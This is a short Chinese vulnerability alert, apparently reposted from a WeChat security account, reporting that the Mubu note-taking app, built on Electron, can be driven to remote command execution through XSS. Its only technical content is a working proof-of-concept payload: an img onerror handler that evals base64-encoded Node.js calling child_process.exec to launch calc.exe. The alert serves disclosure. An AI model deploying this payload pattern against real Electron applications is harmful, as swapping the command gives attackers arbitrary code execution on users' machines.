【漏洞预警】幕布笔记存在远程命令执行漏洞

admin 2023年7月10日01:37:08评论115 views字数 492阅读1分38秒阅读模式

幕布笔记存在远程命令执行漏洞

漏洞概述:

Electron 是一个开源的跨平台框架,用于构建基于Web技术(HTMLCSSJavaScript)的桌面应用程序。它由 GitHub 公司开发并维护,目前具有 108k star

由于 Electron 内置了 Chromium 内核,并且拥有直接执行Nodejs代码的能力,攻击者可借助 XSS 漏洞在服务器端远程执行任意代码

当应用程序使用 Electron 框架时,通过接收攻击者精心构造的 Payload 后可能会产生命令执行漏洞

漏洞详情:

<img src=x onerror='eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ2NhbGMuZXhlJywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0+ewphbGVydChgc3Rkb3V0OiAke3N0ZG91dH1gKTsgCn0pOw==`,`base64`).toString())'>

【漏洞预警】幕布笔记存在远程命令执行漏洞


阅读 10万+

原文始发于微信公众号(利刃信安攻防实验室):【漏洞预警】幕布笔记存在远程命令执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月10日01:37:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞预警】幕布笔记存在远程命令执行漏洞https://cn-sec.com/archives/1863837.html

发表评论

匿名网友 填写信息